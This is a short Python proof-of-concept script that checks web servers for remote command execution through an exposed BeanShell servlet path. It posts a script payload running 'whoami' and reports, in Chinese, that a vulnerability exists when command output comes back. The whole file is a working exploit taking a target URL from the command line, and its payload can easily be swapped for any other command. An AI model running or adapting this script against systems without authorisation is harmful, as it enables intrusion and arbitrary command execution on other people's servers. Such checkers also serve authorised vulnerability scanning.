#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import getopt
import random
import re
import sys

import requests
dir_list = ['/servlet/~ic/bsh.servlet.BshServlet']

class Poc(object):

    def verify(self, data):
        for d in dir_list:
            url = data['url'].strip('/') + d
            headers = data['headers']
            payload = {
                "bsh.script": "exec(\"whoami\")"
            }
            try:
                response = requests.post(url, headers=headers, data=payload, timeout=5, allow_redirects=False)
                flag = re.findall('eeeeee">\s*?<pre>\s*?(.*?)\s*?<\/pre>', response.text)
                if len(flag) > 0:
                    return {
                        'title': '{} 存在漏洞'.format(data['url']),
                        'desc': '返回内容为: {}'.format(flag)
                    }
            except Exception:
                pass

        return None

if __name__ == "__main__":
    argv = sys.argv[1:]
    try:
        opts, args = getopt.getopt(argv, "u:")  # 短选项模式

    except:
        print("Error")

    for opt, arg in opts:
        if opt in ['-n']:
            name = arg
        elif opt in ['-u']:
            url = arg

    p = Poc()
    r = p.verify({
        'url': url,
        'headers': {}
    })
    print(r)